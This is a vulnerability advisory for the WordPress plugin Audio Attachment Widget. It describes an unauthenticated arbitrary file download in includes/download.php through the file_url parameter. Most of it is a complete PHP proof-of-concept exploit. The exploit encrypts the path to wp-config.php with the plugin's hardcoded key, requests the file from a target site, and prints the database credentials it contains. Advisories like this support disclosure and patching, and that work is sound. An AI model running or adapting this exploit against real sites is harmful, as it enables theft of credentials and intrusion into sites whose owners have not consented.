Audio Attachment Widget [Unauthenticated Arbitrary File Download]

Description

Plugin Audio Attachment Widget uses a script in order to provide users a convenient way to download files. This script lacks security checks and allows a malicious user to exploit it in order to download arbitrary files from the server.

Script file is audio-attachment-widget/includes/download.php, vulnerable param is $_REQUEST["file_url"].

PoC

#!/usr/bin/env php
<?php
/*******************************************************************************
 * Audio Attachment Widget - Unauthenticated Arbitrary File Download
 *
 * Author: Pan Vag <[email protected]>
 * To install deps run `composer install`
 ******************************************************************************/

require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;

$url = Config::get( 'url.base', null, true, 'Enter the site URL' );

if ( ! $url ) {
    Cli::writeError( 'You must enter a valid URL' );
    exit( ExitCodes::EXIT_CODE_FAILED_PRECONDITION );
}
$wpConfig = MyEncryption::enc_encrypt( Endpoint::baseURL() . '/wp-config.php' );
$url      = Endpoint::pluginsURL() . '/audio-attachment-widget/includes/download.php?file_url='
            . urlencode( $wpConfig );

$r = Requests::get( $url );

if ( ! $r->success || $r->status_code != 200 || strpos( $r->body, 'DB_NAME' ) === false ) {
    ExitCodes::exitWithFailed( 'Failed to download file, response was: ' . $r->body );
}

Cli::writeSuccess( 'Exploitation successful, follows wp-config.php file contents:' );
Cli::write( $r->body );
ExitCodes::exitWithSuccess();

class MyEncryption {
    private static $key = 'MIGfMA 0GCSqGSIb3D QEBAQUAA4 GNADCBiQKBgQDJmhAL 93uF2NO0bIfW/U4PAS oPEe6gVOkwI23Vek1Vw81Q91Cte D5Bdh4nEPjYigEtqpVSTRDvRjseA4dnkpfVXv LhVXpsUG5Nc7lxSMhO7jj0uiOQMJHQNeP3GCuV3p6gqn3p5s0vsvW6b5vQy7Iuny +x0PfzIU74DnsB0sCQIDAQAB';

    public static function enc_encrypt( $string ) {
        $result = '';
        for ( $i = 0; $i < strlen( $string ); $i ++ ) {
            $char    = substr( $string, $i, 1 );
            $keychar = substr( self::$key, ( $i % strlen( self::$key ) ) - 1, 1 );
            $char    = chr( ord( $char ) + ord( $keychar ) );
            $result .= $char;
        }

        return base64_encode( $result );
    }
}
WordPress Plugins Unauthenticated Arbitrary File Download
INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX